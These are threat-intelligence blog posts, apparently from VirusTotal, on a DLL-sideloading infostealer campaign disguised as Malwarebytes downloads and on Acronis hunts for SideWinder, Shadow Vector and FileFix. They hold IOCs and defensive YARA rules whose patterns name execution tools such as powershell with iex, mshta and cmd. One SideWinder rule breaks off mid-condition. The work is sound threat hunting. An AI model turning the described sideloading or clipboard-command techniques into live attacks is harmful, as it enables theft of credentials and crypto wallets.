Normal view

New Infostealer Campaign Targets Users via Spoofed Software Installers

16 January 2026 at 12:35

Introduction

As part of our commitment to sharing interesting hunts, we are launching these 'Flash Hunting Findings' to highlight active threats. Our latest investigation tracks an operation active between January 11 and January 15, 2026, which uses consistent ZIP file structures and a unique behash ("4acaac53c8340a8c236c91e68244e6cb") for identification. The campaign relies on a trusted executable to trick the operating system into loading a malicious payload, leading to the execution of secondary-stage infostealers.

Findings

The primary samples identified are ZIP files that mostly reference the MalwareBytes company and software using the filename malwarebytes-windows-github-io-X.X.X.zip. A notable feature for identification is that all of them share the same behash.
behash:"4acaac53c8340a8c236c91e68244e6cb"
The initial instance of these samples was identified on January 11, 2026, with the most recent occurrence recorded on January 14.
All of these ZIP archives share a nearly identical internal structure, containing the same set of files across the different versions identified. Of particular importance is the DLL file, which serves as the initial malicious payload, and a specific TXT file found in each archive. This text file has been observed on VirusTotal under two distinct filenames: gitconfig.com.txt and Agreement_About.txt.
The content of the TXT file holds no significant importance for the intrusion itself, as it merely contains a single string consisting of a GitHub URL.
However, this TXT is particularly valuable for pivoting and infrastructure mapping. By examining its "execution parents," analysts can identify additional ZIP archives that are likely linked to the same malicious campaign. These related files can be efficiently retrieved for further investigation using the following VirusTotal API v3 endpoint:
/api/v3/files/09a8b930c8b79e7c313e5e741e1d59c39ae91bc1f10cdefa68b47bf77519be57/execution_parents
The primary payload of this campaign is contained within a malicious DLL named CoreMessaging.dll. Threat actors are utilizing a technique known as DLL Sideloading to execute this code. This involves placing the malicious DLL in the same directory as a legitimate, trusted executable (EXE) also found within the distributed ZIP file. When an analyst or user runs the legitimate EXE, the operating system is tricked into loading the malicious CoreMessaging.dll.
The identified DLLs exhibit distinctive metadata characteristics that are highly effective for pivoting and uncovering additional variants within the same campaign. Security analysts can utilize specific hunting queries to track down other malicious DLLs belonging to this activity. For instance, analysts can search for samples sharing the following unique signature strings found in the file metadata:
signature:"Peastaking plenipotence ductileness chilopodous codicillary."
signature:"© 2026 Eosinophil LLC"
Furthermore, the exported functions within these DLLs contains unusual alphanumeric strings. These exports serve as reliable indicators for identifying related malicious components across different stages of the campaign:
exports:15Mmm95ml1RbfjH1VUyelYFCf exports:2dlSKEtPzvo1mHDN4FYgv
Finally, another observation for behavioral analysis can be found in the relations tab of the ZIP files. These files document the full infection chain observed during sandbox execution, where the sandbox extracts the ZIP, runs the legitimate EXE, and subsequently triggers the loading of the malicious DLL. Within the Payload Files section, additional payloads are visible. These represent secondary stages dropped during the initial DLL execution, which act as the final malware samples. These final payloads are primarily identified as infostealers, designed to exfiltrate sensitive data.
Analysis of all the ZIP files behavioral relations reveals a recurring payload file consistently flagged as an infostealer. This malicious component is identified by various YARA rules, including those specifically designed to detect signatures associated with stealing cryptocurrency wallet browser extension IDs among others.
To identify and pivot through the various secondary-stage payloads dropped during this campaign, analysts can utilize a specific behash identifier. These files represent the final infection stage and are primarily designed to exfiltrate credentials and crypto-wallet information. The following behash provides a reliable pivot point for uncovering additional variants.
behash:5ddb604194329c1f182d7ba74f6f5946

IOCs

We have created a public VirusTotal Collection to share all the IOCs in an easy and free way. Below you can find the main IOCs related to the ZIP files and DLLs too.
import "pe"

rule win_dll_sideload_eosinophil_infostealer_jan26
{
  meta:
    author = "VirusTotal"
    description = "Detects malicious DLLs (CoreMessaging.dll) from an infostealer campaign impersonating Malwarebytes, Logitech, and others via DLL sideloading."
    reference = "https://blog.virustotal.com/2026/01/malicious-infostealer-january-26.html"
    date = "2026-01-16"
    behash = "4acaac53c8340a8c236c91e68244e6cb"
    target_entity = "file"
    hash = "606baa263e87d32a64a9b191fc7e96ca066708b2f003bde35391908d3311a463"
  condition:
    (uint16(0) == 0x5A4D and uint32(uint32(0x3C)) == 0x00004550 and pe.is_dll()) and
    pe.exports("15Mmm95ml1RbfjH1VUyelYFCf") and pe.exports("2dlSKEtPzvo1mHDN4FYgv")
}
sha256 description
6773af31bd7891852c3d8170085dd4bf2d68ea24a165e4b604d777bd083caeaa malwarebytes-windows-github-io-X.X.X.zip
4294d6e8f1a63b88c473fce71b665bbc713e3ee88d95f286e058f1a37d4162be malwarebytes-windows-github-io-X.X.X.zip
5591156d120934f19f2bb92d9f9b1b32cb022134befef9b63c2191460be36899 malwarebytes-windows-github-io-X.X.X.zip
42d53bf0ed5880616aa995cad357d27e102fb66b2fca89b17f92709b38706706 malwarebytes-windows-github-io-X.X.X.zip
5aa6f4a57fb86759bbcc9fc6c61b5f74c0ca74604a22084f9e0310840aa73664 malwarebytes-windows-github-io-X.X.X.zip
84021dcfad522a75bf00a07e6b5cb4e17063bd715a877ed01ba5d1631cd3ad71 malwarebytes-windows-github-io-X.X.X.zip
ca8467ae9527ed908e9478c3f0891c52c0266577ca59e4c80a029c256c1d4fce malwarebytes-windows-github-io-X.X.X.zip
9619331ef9ff6b2d40e77a67ec86fc81b050eeb96c4b5f735eb9472c54da6735 malwarebytes-windows-github-io-X.X.X.zip
a2842c7cfaadfba90b29e0b9873a592dd5dbea0ef78883d240baf3ee2d5670c5 malwarebytes-windows-github-io-X.X.X.zip
4705fd47bf0617b60baef8401c47d21afb3796666092ce40fbb7fe51782ae280 malwarebytes-windows-github-io-X.X.X.zip
580d37fc9d9cc95dc615d41fa2272f8e86c9b4da2988a336a8b3a3f90f4363c2 malwarebytes-windows-github-io-X.X.X.zip
d47fd17d1d82ea61d850ccc2af3bee54adce6975d762fb4dee8f4006692c5ef7 malwarebytes-windows-github-io-X.X.X.zip
606baa263e87d32a64a9b191fc7e96ca066708b2f003bde35391908d3311a463 CoreMessaging.dll DLL loaded by DLL SideLoading
fd855aa20467708d004d4aab5203dd5ecdf4db2b3cb2ed7e83c27368368f02bb CoreMessaging.dll DLL loaded by DLL SideLoading
a0687834ce9cb8a40b2bb30b18322298aff74147771896787609afad9016f4ea CoreMessaging.dll DLL loaded by DLL SideLoading
4235732440506e626fd4d0fffad85700a8fcf3e83ba5c5bc8e19ada508a6498e CoreMessaging.dll DLL loaded by DLL SideLoading
cd1fe2762acf3fb0784b17e23e1751ca9e81a6c0518c6be4729e2bc369040ca5 CoreMessaging.dll DLL loaded by DLL SideLoading
f798c24a688d7858efd6efeaa8641822ad269feeb3a74962c2f7c523cf8563ff CoreMessaging.dll DLL loaded by DLL SideLoading
0698a2c6401059a3979d931b84d2d4b011d38566f20558ee7950a8bf475a6959 CoreMessaging.dll DLL loaded by DLL SideLoading
1b3bee041f2fffcb9c216522afa67791d4c658f257705e0feccc7573489ec06f CoreMessaging.dll DLL loaded by DLL SideLoading
231c05f4db4027c131259d1acf940e87e15261bb8cb443c7521294512154379b CoreMessaging.dll DLL loaded by DLL SideLoading
ec2e30d8e5cacecdf26c713e3ee3a45ebc512059a64ba4062b20ca8bec2eb9e7 CoreMessaging.dll DLL loaded by DLL SideLoading
58bd2e6932270921028ab54e5ff4b0dbd1bf67424d4a5d83883c429cadeef662 CoreMessaging.dll DLL loaded by DLL SideLoading
57ed35e6d2f2d0c9bbc3f17ce2c94946cc857809f4ab5c53d7cb04a4e48c8b14 CoreMessaging.dll DLL loaded by DLL SideLoading
cfcf3d248100228905ad1e8c5849bf44757dd490a0b323a10938449946eabeee CoreMessaging.dll DLL loaded by DLL SideLoading
f02be238d14f8e248ad9516a896da7f49933adc7b36db7f52a7e12d1c2ddc6af CoreMessaging.dll DLL loaded by DLL SideLoading
f60802c7bec15da6d84d03aad3457e76c5760e4556db7c2212f08e3301dc0d92 CoreMessaging.dll DLL loaded by DLL SideLoading
02dc9217f870790b96e1069acd381ae58c2335b15af32310f38198b5ee10b158 CoreMessaging.dll DLL loaded by DLL SideLoading
f9549e382faf0033b12298b4fd7cd10e86c680fe93f7af99291b75fd3d0c9842 CoreMessaging.dll DLL loaded by DLL SideLoading
92f4d95938789a69e0343b98240109934c0502f73d8b6c04e8ee856f606015c8 CoreMessaging.dll DLL loaded by DLL SideLoading
66fba00b3496d61ca43ec3eae02527eb5222892186c8223b9802060a932a5a7a CoreMessaging.dll DLL loaded by DLL SideLoading
e5dd464a2c90a8c965db655906d0dc84a9ac84701a13267d3d0c89a3c97e1e9b CoreMessaging.dll DLL loaded by DLL SideLoading
35211074b59417dd5a205618fed3402d4ac9ca419374ff2d7349e70a3a462a15 CoreMessaging.dll DLL loaded by DLL SideLoading
6863b4906e0bd4961369b8784b968b443f745869dbe19c6d97e2287837849385 CoreMessaging.dll DLL loaded by DLL SideLoading
a83c478f075a3623da5684c52993293d38ecaa17f4a1ddca10f95335865ef1e2 CoreMessaging.dll DLL loaded by DLL SideLoading
43e2936e4a97d9bc43b423841b137fde1dd5b2f291abf20d3ba57b8f198d9fab CoreMessaging.dll DLL loaded by DLL SideLoading
f001ae3318ba29a3b663d72b5375d10da5207163c6b2746cfae9e46a37d975cf CoreMessaging.dll DLL loaded by DLL SideLoading
c67403d3b6e7750222f20fa97daa3c05a9a8cce39db16455e196cd81d087b54d CoreMessaging.dll DLL loaded by DLL SideLoading
5ee9d4636b01fd3a35bd8e3dce86a8c114d8b0aa6b68b1d26ace7ef0f85b438a Payload dropped by one of the malicious DLLs
e84b0dadb0b6be9b00a063ed82c8ddba06a2bd13f07d510d14e6fd73cd613fba Payload dropped by one of the malicious DLLs

Introducing Saved Searches in Google Threat Intelligence (GTI) and VirusTotal (VT): Enhance Collaboration and Efficiency

10 December 2025 at 11:24

We are excited to announce the launch of Saved Searches in Google Threat Intelligence (GTI) and VirusTotal (VT), a powerful new feature designed to streamline your threat hunting workflows and foster seamless collaboration across your security team.

From Campaign to Feature: Better Search Efficiency

For the last month, we’ve highlighted the critical importance of mastering search in our ongoing #monthofgoogletisearch campaign. We saw how security teams rely on complex, highly-tuned queries to identify threats, track adversaries, and perform deep-dive investigations.

This campaign emphasized a key challenge: once you craft the perfect query - a cornerstone of your investigation - it should be easy to reuse and share. Saved Searches is the direct answer to this need, turning successful, repeatable threat-hunting logic into a shared institutional asset.

Collaboration, Simplified: Save and Share Your Queries

With this initial launch of Saved Searches, we’re delivering two foundational capabilities that will immediately improve your team’s efficiency:

  1. Save Searches: Instantly save any complex or frequently used query directly within GTI. This ensures your best investigative logic is always accessible, eliminating the need to rebuild queries from scratch or store them externally.
  2. Share with Users: Critical insights are often time-sensitive. You can now easily share your saved searches with any other user in your organization with access to GTI. Whether you’re escalating a finding or establishing a standard workflow, sharing the exact query ensures consistency and accelerates joint analysis.
This means that a newly onboarded analyst can instantly access the expertise of senior members, and teams can maintain a unified approach to monitoring high-priority threats. It’s collaboration built right into your investigation tool.

Get Started Today with Campaign Searches

The Saved Searches feature is live now in Google Threat Intelligence and VirusTotal.

To help you hit the ground running, we have made the most impactful searches used throughout the #monthofgoogletisearch campaign public and available to all intelligence users! You can find these expert-crafted queries in your Saved Searches section today - a perfect starting point for your investigations.



Start by exploring these campaign searches and then easily save and share your own complex search queries. Look for the option to Save and Share your searches to transform your investigative logic into a shared asset.



This is just the first phase of enhancing search capabilities within GTI. We are committed to building on this foundation to provide even more robust tools that make your threat intelligence actionable and collaborative.

You can get more info by exploring our documentation page:

Thank you for your feedback during the #monthofgoogletisearch campaign - your input directly fueled this launch.

Happy Hunting! ^_^

VTPRACTITIONERS{ACRONIS}: Tracking FileFix, Shadow Vector, and SideWinder

10 November 2025 at 12:56

Introduction

We have recently started a new blog series called #VTPRACTITIONERS. This series aims to share with the community what other practitioners are able to research using VirusTotal from a technical point of view.
Our first blog saw our colleagues at SEQRITE tracking UNG0002, Silent Lynx, and DragonClone. In this new post, Acronis Threat Research Unit (TRU) shares practical insights from multiple investigations, including the ClickFix variant known as FileFix, the long-running South Asian threat actor SideWinder, and the SVG-based campaign targeting Colombia and named Shadow Vector.

How VT plays a role in hunting for analysts

For the threat analyst, web-based threats present a unique set of challenges. Unlike file-based malware, the initial stages of a web-based attack often exist only as ephemeral artifacts within a browser. The core of the investigation relies on dissecting the components of a website, from its HTML and JavaScript to the payloads it delivers. This is where VT capabilities for archiving and analyzing web content become critical.
VT allows analysts to move beyond simple URL reputation checks and delve into the content of web pages themselves. For attacks like the *Fix family, which trick users into executing malicious commands, the entire attack chain is often laid bare within the page's source code. The analyst's starting point becomes the malicious commands themselves, such as navigator.clipboard.writeText or document.execCommand("copy"), which are used to surreptitiously copy payloads to the victim's clipboard.
The Acronis team's investigation into the FileFix variant demonstrates a practical application of this methodology. Their research began not with a specific sample, but with a hypothesis that could be translated into a set of hunting rules. Using VT's Livehunt feature, they were able to create YARA rules that searched for new web pages containing the clipboard commands alongside common payload execution tools like powershell, mshta, or cmd. This proactive hunting approach allowed them to cast a wide net and identify potentially malicious sites in real-time.
One of the main challenges in this type of hunting is striking a balance between rule specificity and the need to uncover novel threats. Overly broad rules can lead to a deluge of false positives, while highly specific rules risk missing creatively crafted commands. The Acronis team addressed this by creating multiple rulesets with varying levels of specificity, allowing them to both find known threats and uncover new variants like FileFix.
In the case of the SideWinder campaign, which uses document-based attacks, VT value comes from its rich metadata and filtering capabilities. Analysts can hunt for malicious documents exploiting specific vulnerabilities, and then narrow the results by focusing on specific geographic regions through submitter country information. This allows them to effectively isolate threats that match a specific actor's profile, such as SideWinder's focus on South Asia.
Similarly, for the Shadow Vector campaign, which used malicious SVG files to target users in Colombia, VT content search and archiving proved essential. The platform's ability to store and index SVG content allowed researchers to identify a campaign using judicial-themed lures. By combining content searches for legal keywords with filters like submitter:CO, the Acronis team could map the entire infection chain and its infrastructure, transforming fragmented indicators into a comprehensive intelligence picture.

Acronis - Success Story

[In the words of Acronis…]
Acronis Threat Research Unit (TRU) used VirusTotal’s platform for threat hunting and intelligence across several investigations, including FileFix, SideWinder, and Shadow Vector. In the FileFix case, TRU used VT’s Livehunt framework, developing rules to identify malicious web pages using clipboard manipulation to deliver PowerShell payloads. The ability to inspect archived HTML and JavaScript whitin the VirusTotal platform allowed the team to uncover not only known Fix-family attacks but also previously unseen variants that shared code patterns.
VirusTotal’s data corpus also supported Acronis TRU’s broader threat tracking. In the SideWinder campaign, VT’s metadata and sample filtering capabilities helped analysts trace targeted document-based attacks exploiting tag:CVE-2017-0199 and tag:CVE-2017-11882 across South Asia, leading to the creation of hunting rules later published in “From banks to battalions: SideWinder’s attacks on South Asia’s public sector”.
Similarly, during the “Shadow Vector targets Colombian users via privilege escalation and court-themed SVG decoys” investigation, VT’s archive of SVG content exposed a campaign targeting Colombian entities that embedded judicial lures and external payload links within SVG images. By correlating samples with metadata filters such as submitter:CO and targeted content searches for terms like href="https://" and legal keywords, the team mapped an entire infection chain and its supporting infrastructure. Across all these efforts, VirusTotal provided a unified environment where Acronis could pivot, correlate, and validate findings in real time, transforming fragmented indicators into comprehensive, actionable intelligence.

Hunting Exploits Like It’s 2017-0199 (SideWinder Edition)

SideWinder is a well-known threat actor that keeps going back to what works. Their document-based delivery chain has been active for years, and the group continues to rely on the same proven exploits to target government and defense entities across South Asia. Our goal in this hunt was to get beyond just finding samples. We wanted to understand where new documents were surfacing, who they were likely aimed at, and what types of decoys were in circulation during the latest campaign wave. VirusTotal gave us the visibility we needed to do that efficiently and at scale.
We started by digging into Microsoft Office and RTF files recently uploaded to VirusTotal that were tagged with CVE-2017-0199 or CVE-2017-11882 and coming from Pakistan, Bangladesh, Sri Lanka, and neighboring countries. By filtering based on VT metadata such as submitter country and file type, and by excluding obvious noise from bulk submissions or unrelated activity, we could narrow our focus to the samples that actually fit SideWinder’s operational profile.
/*
    Checks if the file is tagged with CVE-2017-0199 or CVE-2017-11882
    and originates from one of the targeted countries
    and the file type is a Word document, RTF, or MS-Office file
*/
import "vt"
rule hunting_cve_maldocs {
    meta:
        author = "Acronis Threat Research Unit (TRU)"
        description = "Hunting for malicious Word/RTF files exploiting CVE-2017-0199 or CVE-2017-11882 from specific countries"
        distribution = "TLP:CLEAR"
        version = "1.2"

    condition:
        // Match if the file has CVE-2017-0199 or CVE-2017-11882 in the tags
        for any tag in vt.metadata.tags : 
        ( 
            tag == "cve-2017-0199" or 
            tag == "cve-2017-11882" 
        )
        // Originates from a specific country?
        and 
        (
            // Removed CN due to spam submissions of related maldocs
            vt.metadata.submitter.country == "PK" or 
            vt.metadata.submitter.country == "LK" or 
            vt.metadata.submitter.country == "BD" or 
            vt.metadata.submitter.country == "NP" or 
            vt.metadata.submitter.country == "MM" or 
            vt.metadata.submitter.country == "MV" or 
            vt.metadata.submitter.country == "AF"
        )
        // Is it a DOC, DOCX, or RTF?
        and 
        (
            vt.metadata.file_type == vt.FileType.DOC or
            vt.metadata.file_type == vt.FileType.DOCX or
            vt.metadata.file_type == vt.FileType.RTF
        )
        // Different TA spotted using .ru TLD (excluding it for now)
        and not (
            for any url in vt.behaviour.memory_pattern_urls : (
                url contains ".ru"
            )
        )
        and vt.metadata.new_file
} 
Next, we began translating those results into new livehunt rules. The initial version was intentionally broad: match any new document exploiting those CVEs, uploaded from a small list of countries of interest, and restricted to document file types like DOC, DOCX, or RTF. We also added logic to avoid hits that didn’t fit SideWinder’s patterns, such as samples calling out .ru infrastructure tied to other known threat clusters.
A good starting point when creating broad hunting rules is to define a daily notification limit and if everything works as expected and the level of false positives is tolerable, begin refining the rule as more and more hits come to our inbox.
It’s always a good idea to not spam your own inbox when creating broad hunting rules
In our case, the final hunting rule ended up matching a hexadecimal pattern for malicious documents used by SideWinder. By adding filters for submitter country and only triggering on new files, the rule produced a reliable feed of samples that we could confidently attribute to this actor for further analysis.
/*
    Sidewinder related malicious documents exploiting CVE 2017-0199 used during 2025 campaign
*/
import "vt"
rule apt_sidewinder_documents
{
    meta:

        author = "Acronis Threat Research Unit (TRU)"
        description = "Sidewinder related malicious documents exploiting CVE 2017-0199"
        distribution = "TLP:CLEAR"
        version = "1.0"

    strings:

        $a1 = {62544CB1F0B9E6E04433698E85BFB534278B9BDC5F06589C011E9CB80C71DF23}
        $a2 = {E20F76CDABDFAB004A6BA632F20CE00512BA5AD2FE8FB6ED9EE1865DFD07504B0304140000}

    condition:

        filesize  
Once we refined the rule set, SideWinder activity became much easier to track consistently. We began to see new decoys appear in near real time, allowing us to monitor changes in themes and spot repeated use of lure content and infrastructure across different campaigns. Using the same logic in retrohunt confirmed our observations that SideWinder had been using the same tactics for months, only changing the decoy topics while keeping the underlying delivery technique intact.
Using Retrohunt to uncover additional samples and establish the threat actor’s timeline
We also observed geofencing behavior in the delivery chain. If the server hosting the external resource did not recognize the visitor or the IP range did not match the intended target, the server often returned a benign decoy file (or an HTTP 404 error code) instead of the real payload.
While relying on exploits from 2017, SideWinder carefully filters the victims that will receive the final malicious payload
One recurring decoy had the SHA256 hash 1955c6914097477d5141f720c9e8fa44b4fe189e854da298d85090cbc338b35a, which corresponds to an empty RTF document. That decoy is useful as a hunting pivot: by searching for that hash and combining it with submitter country and file type filters in VT, you can separate likely targeted, genuine hits from broad noise and map where geofencing is being applied.
RTF empty decoy file used by SideWinder still presents valuable information for pivoting into other parts of their infrastructure
In addition, VirusTotal allowed us to trace the attack back to the initial infection vector and recover some of the spear phishing emails that started the chain. We pivoted from known samples and shared strings, and used file relations to follow linked URLs and artifacts upstream, and found an .eml file that contained the original message and attachment. One concrete example is the spear phish titled 54th CISM World Military Naval Pentathlon 2025 - Invitation.eml, indexed in VirusTotal with behavior metadata and attachments tied to the same infrastructure.
Getting initial infection spear-phishing e-mails allowed us to put together the different pieces of the puzzle, from beginning to end
For other hunters, the key takeaway is that even older exploits like CVE-2017-0199 can reveal a lot when you combine multiple VirusTotal features. In this case, we used metadata, livehunt, and regional telemetry to connect seemingly unrelated samples. We also checked hashtags and community votes, including those from researchers like Joseliyo, to cross-check our assumptions and spot ongoing discussions about similar activity. The Telemetry tab helped us see where submissions were coming from geographically, and the Threat Graph view made it easier to visualize how documents, infrastructure, and payloads were linked.
Every single data point counts when hunting for new samples
Using these tools together turned a noisy set of samples into a clear picture of SideWinder’s targeting and operations.

Uncovering Shadow Vector’s SVG-Based Crimeware Campaign in Colombia

During our research, we identified a campaign we refer to as Shadow Vector, which used malicious SVG images crafted as court summonses and legal notifications to target users in Colombia.
An example of a rendered SVG lure with a judicial correspondence theme
These files mimicked official judicial correspondence and contained embedded links to externally hosted payloads, such as script-based downloaders or password-protected archives. The investigation began after we noticed an unusual pattern of SVG submissions from Colombia. By using a small set of samples for an initial rule, we began our hunt.
<!--
    This YARA rule detects potentially malicious SVG files that are likely being used for crimeware campaigns targeting Colombia.
    The rule identifies SVG images that contain legal or judicial terms commonly used in phishing scams, 
    along with embedded external links that could be used to deliver a payload.
-->
import "vt"
rule crimeware_svg_colombia {
   meta:
        author = "Acronis Threat Research Unit (TRU)"
        description = "Detects potentially malicious SVG files that are likely being used for crimeware campaigns targeting Colombia"
        distribution = "TLP:CLEAR"
        version = "1.1"

        // Reference hashes
        hash1 = "6d4a53da259c3c8c0903b1345efcf2fa0d50bc10c3c010a34f86263de466f5a1"
        hash2 = "2aae8e206dd068135b16ff87dfbb816053fc247a222aad0d34c9227e6ecf7b5b"
        hash3 = "4cfeab122e0a748c8600ccd14a186292f27a93b5ba74c58dfee838fe28765061"
        hash4 = "9bbbcb6eae33314b84f5e367f90e57f487d6abe72d6067adcb66eba896d7ce33"
        hash5 = "60e87c0fe7c3904935bb1604bdb0b0fc0f2919db64f72666b77405c2c1e46067"
        hash6 = "609edc93e075223c5dc8caaf076bf4e28f81c5c6e4db0eb6f502dda91500aab4"
        hash7 = "4795d3a3e776baf485d284a9edcf1beef29da42cad8e8261a83e86d35b25cafe"
        hash8 = "5673ad3287bcc0c8746ab6cab6b5e1b60160f07c7b16c018efa56bffd44b37aa"
        hash9 = "b3e8ab81d0a559a373c3fe2ae7c3c99718503411cc13b17cffd1eee2544a787b"
        hash10 = "b5311cadc0bbd2f47549f7fc0895848adb20cc016387cebcd1c29d784779240c"
        hash11 = "c3319a8863d5e2dc525dfe6669c5b720fc42c96a8dce3bd7f6a0072569933303"
        hash12 = "cb035f440f728395cc4237e1ac52114641dc25619705b605713ecefb6fd9e563"
        hash13 = "cf23f7b98abddf1b36552b55f874ae1e2199768d7cefb0188af9ee0d9a698107"
        hash14 = "f3208ae62655435186e560378db58e133a68aa6107948e2a8ec30682983aa503"

   strings:
        // SVG 
        $svg = "<svg xmlns=" ascii fullword

        // Documents containing legal or judicial terms
        $s1 = "COPIA" nocase
        $s2 = "CITACION" nocase
        $s3 = "JUZGADO" nocase
        $s4 = "PENAL" nocase
        $s5 = "JUDICIAL" nocase
        $s6 = "BOGOTA" nocase
        $s7 = "DEMANDA" nocase

        // When image loads it retrieves payload from external website using HTTPS
        $href1= "href='https://" nocase
        $href2 = "href=\"https://" nocase

   condition:
      $svg 
      and filesize < 3MB
      and 3 of ($s*)
      and any of ($href*)
      and vt.metadata.submitter.country == "CO"
}
By including reference hashes from manually verified samples, we used a broad hunting rule both as detection mechanism and a pivot point for uncovering related infrastructure or newly generated lures.
Once the initial hunting logic was in place, we refined it into a livehunt rule specifically tailored for SVG-based decoys. The rule matched files containing judicial terminology and outbound HTTPS links, while filtering by file size and origin to reduce false positives. Using this rule, we began collecting and analyzing related uploads.
We used the VT Diff functionality to compare variations between samples and quickly spot patterns, such as repeated words, hexadecimal values, URLs, or metadata tags that hinted at automated generation (i.e. the string “Generado Automaticamente”).
VT Diff feature helped us to identify patterns
Results of our VT Diff session
While we could not conclusively attribute the SVG decoy campaign to Blind Eagle at the time of research, the technical and thematic overlaps were difficult to ignore. The VT blog “Uncovering a Colombian Malware Campaign with AI Code Analysis” describes similar judicial-themed SVG files used as lures in operations targeting Colombian users. As with other open reports on this threat actor, attribution remains based on cumulative evidence, clustering campaigns based on commonalities such as infrastructure reuse, phishing template design, malware family selection, and linguistic or regional indicators observed across samples.
rule crimeware_shadow_vector_svg
{

    meta:

        description = "Detects malicious SVG files associated with Shadow
Vector's Colombian campaign"
        author = "Acronis Threat Research Unit (TRU)"
        file_type = "SVG"
        malware_family = "Shadow Vector"
        threat_category = "Crimeware / Malicious Image / Embedded Payload"
        tlp = "TLP:CLEAR"

strings:

        $svg_tag1 = "<?xml" ascii
        $svg_tag2 = "<svg" ascii
        $svg_tag3 = "<!DOCTYPE svg" ascii
        $svg_tag4 = "http://www.w3.org/2000/svg" ascii 

        //used by Shadow Vector (possibly generated in batch)

        $judicial = "juzgado" ascii nocase
        $judicial_1 = "citacion" ascii nocase
        $judicial_2 = "judicial" ascii nocase
        $judicial_3 = "despacho" ascii nocase
        $generado = "Generado" ascii nocase

    condition:

        filesize < 3MB and
        3 of ($svg_tag*) and
        (1 of ($judicial*) and $generado)
}
The evolution from the initial hunting rule to the refined detection rule illustrates our approach to threat hunting in VT, iterative and continuously refined through testing and analysis. The first rule was broad, meant to surface related samples and reveal the full scope of the campaign. It proved useful in livehunt and retrohunt, helping us find clusters of judicial-themed SVGs and their linked payloads. As the investigation progressed, we focused on precision, reducing false positives and removing elements that did not add value. Tuning a rule is always a balance: removing one pattern might miss some samples, but it can also make the rule more accurate and easier to maintain.

FileFix in the wild!

A few weeks ago, the TRU team at Acronis released research on a (at the time) rarely seen variant of the ClickFix attack, called FileFix. Much of the investigation of this attack vector was possible thanks to VirusTotal’s ability to archive, search, and write rules for finding web pages. We, at Acronis, together with VT, wanted to share a bit of information on how we did it- so that others can better research this type of emerging threat.

Anatomy of an attack- where do we start?

Like many phishing attacks, *Fix attacks rely on malicious websites where victims are tricked into running malicious commands. Lucky for us, these attacks have a few particular components that are in common to all, or many, *Fix attacks. Using VT, we were able to write rules and livehunt for any new web pages which included these components, and were able to quickly reiterate on rules that were too broad.
One thing all *Fix attacks have in common, is that they copy a malicious command to the victims clipboard- copying the malicious command, rather than letting the user copy the command themselves, allows attackers to try to hide the malicious part of the command from the victim, and only allow for a smaller, “benign” portion of the command to appear when they copy it into their Windows Run Dialogue or address bar. This commonality gives us two great strings to hunt for:
  • The commands used to copy text into the victims clipboard
  • The commands used to construct the malicious payload
We began our research by using the Livehunt feature, and wrote a rule to detect navigator.clipboard.writeText and document.execCommand("copy"), both used for copying into clipboard, as well as any string including the words powershell, mshta, cmd, and other commands we find commonly used in *Fix attacks. At its most basic form, a rule might look like this:
import "vt"

rule ClickFix
{
  strings:
    $clipboard = /(navigator\.clipboard\.writeText|document\.execCommand\(\"copy\"\))/
    $pay01 = /(powershell|cmd|mshta|msiexec|pwsh)/gvfi
  condition:
    vt.net.url.new_url and
    $clipboard and
    any of ($pay*)
}  
However, this is far from enough. There are plenty of benign sites that use the copy to clipboard feature, and also have the words powershell or cmd present (the three letters “cmd” appear often as part of Base64 strings). This makes things a bit more tricky, as it requires us to iron out these false positives. We need to make our patterns look more similar to real powershell or cmd commands.
Unfortunately, there is such a huge variance in how these commands are written, that the more rigid our patterns became, the more likely it was for us to miss a true positive that included something we haven’t seen before or couldn’t think of. This requires a balancing act- if your rules are too rigid, you will miss true positives that employ a creatively crafted command; too loose and you will receive a large number of false positives, which will slow down investigation.
For example, we can try narrowing down our rule to include more true positives of powershell commands by searching for a string that’s better resembling some of the powershell commands we’ve seen as part of a ClickFix payload, by including the “iex” cmdlet, which tells the powershell command to execute a command:
$pay03 = /powershell.{,80}iex/
This will match whenever the word powershell appears, with the word iex appearing 0 to 80 characters after it. This should reduce the number of false positives we see related to powershell, as it more clearly resembles a powershell command, but at the same time limits our rule to only catch powershell commands that follow this structure- any true positive command with more than 80 characters between the word powershell and iex, or commands forgoing the use of iex, will not be caught.
We ended up setting a number of separate rulesets, some were more specific, others more generic. The more generic ones helped us tune our more specific rulesets. This tactic allowed us to find a large number of ClickFix attacks. Most were run of the mill fake captchas, leveraging ClickFix, others were more interesting. As we continued fine tuning our rules, and within a week of setting up our Livehunt, one of our more generic rules has made an interesting detection. At first glance, it appeared to be a false positive, but as we looked closer, we discovered that it’s exactly what we were hoping to find- a FileFix attack.

Analyzing payloads

One of the nicest things about researching a *Fix attack is that the payload is right there on the website, right in plain site. This offers a few advantages- the first is that we can examine the payload even when the phishing site itself is down, as long as it’s archived by VT. The second advantage is we can further search for similar patterns on VT via VT queries to try and catch other attacks from the same campaign.
Payloads are visible directly in VT, by using the content tab on any suspected website (and in this case- obfuscated)
Often, these payloads may contain additional malicious urls which are used to download and execute additional payloads. These can also very easily be examined on VT, and any files they lead to may also be downloaded directly from VT.
In our investigation of the FileFix site, we found that the payload (a powershell command) downloads an image, and then runs a script that is embedded in the image file. That second-stage script then decrypts and extracts an executable from the image and runs it.
FileFix site downloading and extracting code from an image (highlighted)
We were using both a VM and VT to investigate these payloads. One interesting way we were able to use VT is to track additional examples of the malicious images, as parts of the command were embedded as strings in the image file, allowing us to match these patterns via a VT query and find new examples of the attack, or by searching for the file name or the domain which hosts it.
Pivoting on the domain hosting malicious .jpg files, to investigate additional stages of the attack, archived by VT
VT has been extremely helpful in allowing us to very easily analyze malicious URLs used not only for phishing, but also for delivering malware and additional scripts. In some examples, we were able to get quite far along the chain of scripts and payloads without ever having to spin up a VM, just by looking at the content tab, to see what’s inside a particular file. That’s not going to be the case every time, but it’s certainly nice when it does happen.
The malicious images used during the attack contain parts of the malicious code used in the second stage of the attack
By pivoting on specific strings from within that code, we are able to locate other samples of the malicious images and scripts created by the same attacker, and further pivot to uncover their infrastructure
The ability to investigate and correlate various stages, or multiple samples from the same attacker, were a huge boon to us during the investigation. It allowed us to quickly connect the dots without leaving VT, and should be a great asset in your investigation.

Looking for a *Fix

So now that you know all this- what's next? How can this be useful? Well, we hope it can be helpful in a number of ways.
Firstly, working together as a community, it is important that we continue to catch and block URLs that are employing *Fix attacks. It’s not easy to detect a *Fix site dynamically, and prevention may still happen in many cases after the payload has already been run. Maintaining a robust blocklist remains a very good and accessible option for stopping these threats.
